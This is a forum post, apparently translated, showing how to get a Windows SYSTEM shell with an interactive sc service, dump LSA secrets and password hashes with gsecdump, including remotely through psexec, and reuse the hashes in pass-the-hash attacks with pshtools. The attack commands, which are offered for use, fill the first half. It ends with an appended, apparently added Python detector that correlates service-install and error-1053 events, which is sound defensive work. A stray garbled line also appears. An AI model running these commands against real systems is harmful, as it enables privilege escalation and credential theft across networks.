To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use the iam tool from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually don't need to be cracked at all; it's just a matter of using the tools. The original article puts it well: no matter whether the password is 4 characters or 127 characters long, once you have the hash it's 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( \) E8 q0 G( j: Z6 `: g$ @
I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
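The service trick at the top of the post leaves a distinctive trace for defenders: a service gets installed whose image path is cmd.exe, and because cmd.exe never reports back to the service control manager, the start attempt is logged as failing with error 1053 while the shell keeps running. The script below is an added example (not part of this post or of the truesecurity.se article it quotes) that correlates those two events per service name over a few constructed log lines. The line format, the field names and the service names other than shellcmdline are all constructed for the example; a real collector would pull the same fields from the System log event XML for events 7045 and 7000.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the original post). The layout only
# loosely mirrors the text fields of Windows System log events 7045 (service
# installed) and 7000 (service failed to start); a real collector would read
# the same fields from the event XML.
SAMPLE_EVENTS = [
    "7045|ServiceName=Spooler|ImagePath=C:\\WINDOWS\\system32\\spoolsv.exe"
    "|StartType=auto start|Account=LocalSystem",
    "7045|ServiceName=shellcmdline|ImagePath=C:\\WINDOWS\\system32\\cmd.exe /K start"
    "|StartType=demand start|Account=LocalSystem",
    "7000|ServiceName=shellcmdline|Error=1053",
    "7045|ServiceName=Updater|ImagePath=C:\\Program Files\\Vendor\\updater.exe"
    "|StartType=auto start|Account=LocalSystem",
    "7000|ServiceName=Updater|Error=1053",
]

# Executables that are never legitimate service binaries. cmd.exe is the only
# entry this example needs; extend the set for your own environment.
SHELL_IMAGES = {"cmd.exe"}

# Leading executable of an ImagePath, quoted or not, ignoring arguments after it.
_EXE_RE = re.compile(r'^"?(.*?\.exe)\b', re.IGNORECASE)


def parse_event(line):
    """Split one constructed log line into an event id plus key/value fields."""
    event_id, *fields = line.split("|")
    record = {"EventID": int(event_id)}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    return record


def image_basename(image_path):
    """Lowercase executable name from a service ImagePath, e.g.
    'C:\\WINDOWS\\system32\\cmd.exe /K start' or '"C:\\Program Files\\x\\a.exe" -q'."""
    text = image_path.strip()
    match = _EXE_RE.match(text)
    path = match.group(1) if match else text.split(" ", 1)[0]
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(lines):
    """Correlate 7045 and 7000 events per service name.

    Returns {service_name: {"severity": ..., "reasons": [...]}} for every
    service that triggered at least one indicator.
    """
    findings = defaultdict(lambda: {"reasons": []})
    for record in map(parse_event, lines):
        name = record.get("ServiceName", "")
        if record["EventID"] == 7045:
            exe = image_basename(record.get("ImagePath", ""))
            if exe in SHELL_IMAGES:
                findings[name]["reasons"].append(f"service image is {exe}")
                findings[name]["image"] = record["ImagePath"]
        elif record["EventID"] == 7000 and record.get("Error") == "1053":
            # A plain program registered as a service never reports back to the
            # service control manager, so the SCM logs 1053 even though the
            # process it launched may keep running.
            findings[name]["reasons"].append("start failed with error 1053")
    for finding in findings.values():
        shell = any(r.startswith("service image") for r in finding["reasons"])
        timeout = any("1053" in r for r in finding["reasons"])
        # 1053 alone is a weak signal (broken services do this too); a shell
        # image plus 1053 is the exact pattern shown in the post above.
        finding["severity"] = "high" if shell and timeout else ("medium" if shell else "low")
    return dict(findings)


if __name__ == "__main__":
    for name, finding in analyze(SAMPLE_EVENTS).items():
        print(f"{finding['severity']:<6} {name}: {'; '.join(finding['reasons'])}")
```

Running the block reports shellcmdline as high (shell image plus 1053), the constructed Updater service as low (1053 only, which a merely broken service would also produce), and nothing for Spooler. Keying the correlation on the service name rather than on the order of events matters because the install and the failed start can be minutes apart, and because the sc delete at the end of the post removes the service but not the already-written events.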